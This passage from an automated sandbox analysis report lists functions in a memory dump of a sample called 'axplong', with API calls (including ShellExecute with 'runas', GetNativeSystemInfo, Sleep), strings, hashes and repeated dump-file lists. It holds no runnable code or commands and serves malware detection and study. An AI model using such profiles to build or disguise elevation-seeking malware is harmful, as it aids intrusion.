Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: K9pqLk==$K9pqMU==$K9prKk==
API String ID: 1721193555-747669196
Opcode ID: 0255bc11bf336718db537c8dfb6b71f6fc551f1bbc0f4eef28a5af6ef9b4636a
Instruction ID: 7d455b9686e86e04df81c5fbd7597147e6d0b07bef20db6ee342ad8ba1da3880
Opcode Fuzzy Hash: 0255bc11bf336718db537c8dfb6b71f6fc551f1bbc0f4eef28a5af6ef9b4636a
Instruction Fuzzy Hash: 80D11E70E006189BDF54BB68DC5A3BD7B71AB46310F904288EA15AB3C1DB745F498BE3

Function 00CF73E0 Relevance: 4.8, APIs: 3, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

runas, xrefs: 00CF72B3

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitExecuteMtx_destroy_in_situShell
String ID: runas
API String ID: 1191624902-4000483414
Opcode ID: eb19a48cc1b633e10c8ff8380cb15ea65b460823ad5ade8fd9bfb11dbdbe7496
Instruction ID: 224b309e64aac3051575470d4732854a05bfc3e22a848fbb66c9ee702f76e218
Opcode Fuzzy Hash: eb19a48cc1b633e10c8ff8380cb15ea65b460823ad5ade8fd9bfb11dbdbe7496
Instruction Fuzzy Hash: C7A13571A042489BDB08DF68CC86B9D7B66EB45304F508219F905EB3D1DB75AA84CB71

Function 00D26DE1 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00D26E03
GetFileInformationByHandle.KERNEL32(?,?), ref: 00D26E5D
__dosmaperr.LIBCMT ref: 00D26EF2

Part of subcall function 00D27157: __dosmaperr.LIBCMT ref: 00D2718C

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 70de30270d7df57ea252c3f9d1398494331d024c9659122c5e45a3b4af725a8b
Instruction ID: 0d444271ae807df60bd2d7e6a43a56c9ff16f08babd53516c984c18c0813bf41
Opcode Fuzzy Hash: 70de30270d7df57ea252c3f9d1398494331d024c9659122c5e45a3b4af725a8b
Instruction Fuzzy Hash: 21414875900358ABDF24EFA5E9459AFBBF9EF99304B148529F956D3610EA30E804CB30

Function 00D26C79 Relevance: 3.1, APIs: 2, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03cfc6a8240f88deeb5346956197234f0191f511ce1ee9804c757b445159c67
Instruction ID: 559a5d35211ed5c164bba3914ec37098e24ba42e061740c42b3b63db98652acb
Opcode Fuzzy Hash: b03cfc6a8240f88deeb5346956197234f0191f511ce1ee9804c757b445159c67
Instruction Fuzzy Hash: 3A21B372A052286AEB21BB64BC42B9E3B29DF5237CF240314F9343B1D1DBB0DD0596B1

Function 00CF8290 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 00CF8434

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: c260de99fe598ab2d7f1140d8de24c8e5e7400af8d21dc813fa57807a2f11103
Instruction ID: 63317250991b7f9af7221e8758e575bf4b34d62778a78d97911d690a9b57a4db
Opcode Fuzzy Hash: c260de99fe598ab2d7f1140d8de24c8e5e7400af8d21dc813fa57807a2f11103
Instruction Fuzzy Hash: 1C513B70D0021C9BDB14EB68DD497FEBB75DB45310F504298EA18AB2D1EF715E888FA2

Function 00D26F51 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00D26F93

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: 03d35296fd9917c6d23f956c25a7823a9f49785ffa0dbde6c9182073120387fa
Instruction ID: 55e511e38a1cb749e2a971b30df40e95043388813fa95db9523b8fa3de8d6d7e
Opcode Fuzzy Hash: 03d35296fd9917c6d23f956c25a7823a9f49785ffa0dbde6c9182073120387fa
Instruction Fuzzy Hash: AC110AB290020CAACF10DA95E944EDFB7BCAF18314F545266E511E2190EB30EA488B71

Function 00D2AEEB Relevance: 1.5, APIs: 1, Instructions: 33
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000000,00D06AF7,?,?,00D0D302,00D06AF7,?,00D078CB,8B18EC84,05050A67), ref: 00D2AF1E

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 1ef810fb357675d4629aae163e68f3ebed6cf59fd1acf11d38bec290bc4d906b
Instruction ID: 017e8f267221b337857f25f6080958f60fd699228ad3e6c36d60b2808f0f50e0
Opcode Fuzzy Hash: 1ef810fb357675d4629aae163e68f3ebed6cf59fd1acf11d38bec290bc4d906b
Instruction Fuzzy Hash: 3BE06DB55052326B9B2122697E41B6B769CDFB63B9F190120BD4597180DB69C80095F2

Function 00D06AB0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00D06B35

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c1552faee282168092bb817a2fd9cc211a3b5d8551d5786f412b6cb491ffd73
Instruction ID: cb5dbc1f56eac0b90871c34fb3241c9f2a3937c4c67562d2a328692735270700
Opcode Fuzzy Hash: 2c1552faee282168092bb817a2fd9cc211a3b5d8551d5786f412b6cb491ffd73
Instruction Fuzzy Hash: C0F08671E00604ABC700BB688D07B5EBF65E707760F800258EA15673D5DA71591887F3

Non-executed Functions

Function 00D33048 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00D331C3

Strings

1#QNAN, xrefs: 00D34361
1#IND, xrefs: 00D34353
1#SNAN, xrefs: 00D3435A
1#INF, xrefs: 00D3437E

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 53890f3a800ee8386862c9a6e94f5ba2851c678a94a70803a1e92d601d31835e
Instruction ID: a16e0ff2cb4755db5c3f9a30c96e3921894eb6e427d5171be2723be8c545bf5d
Opcode Fuzzy Hash: 53890f3a800ee8386862c9a6e94f5ba2851c678a94a70803a1e92d601d31835e
Instruction Fuzzy Hash: F1C24E71E046288FDB65CF28DE407EAB7B5EB48315F1441EAD84DE7240E778AE858F60

Function 00D32BB0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 837060903097925e2bf51a469982fb170a72fe244ca5c88116db96d8f54f16a9
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: F7F12E71E002199FDF14CFA9D9906AEF7B1FF48314F158269E919AB344D731AE41CBA0

Function 00D0CAED Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00D0CE55,?,?,?,?,00D0CE8A,?,?,?,?,?,?,00D0C400,?,00000001), ref: 00D0CB06

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: 3df41f4c372e89b3574d3ade52deb9b634d4e35fd7b3e4702274a8150a1a562c
Instruction ID: 4d66b04e81e9f24b3d5b98b8ab486143767f14277e6839abc865d425c6dd1ddf
Opcode Fuzzy Hash: 3df41f4c372e89b3574d3ade52deb9b634d4e35fd7b3e4702274a8150a1a562c
Instruction Fuzzy Hash: 2AD02232A1373893CA123F80BC286ACBB0CAB05B503141221ED0993250CA609C005FF8

Function 00D27D63 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00D27EDF

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 24a3f0ee0badb64c767563705e23940f81b3a816059ed399ea365a6b188c0332
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 3751897020C67A96DF388A28B5967FE679AAF7230CF1C049DF482D7381DA11DD4493B2

Function 00CF4CD0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac38274c18a709c95e29386507fc39bd8acc2d17bf50b3c31e2f1796e9e8f97
Instruction ID: 14d7b6fc70e72346c87e3b786d39c06ba5acaae738c5cc74acb0231709c39ecf
Opcode Fuzzy Hash: cac38274c18a709c95e29386507fc39bd8acc2d17bf50b3c31e2f1796e9e8f97
Instruction Fuzzy Hash: 742263B3F516144BDB4CCA5DDCA27ECB2E3AFD821470E803DE80AE3345EA79D9159A44

Function 00D36EE9 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49b0e2641604714610a40f627d47b0bac26674f967529881c460e2d2cfb9dc3c
Instruction ID: 846810b1b10d7d6f5b4129b9b42ca0bfaadb00e4827b9d426cb0903ae39f5844
Opcode Fuzzy Hash: 49b0e2641604714610a40f627d47b0bac26674f967529881c460e2d2cfb9dc3c
Instruction Fuzzy Hash: 3EB15B72614A05DFD729CF28C486B657BB0FF45364F298658E8DACF2A1C335E982CB50

Function 00CF4AD0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
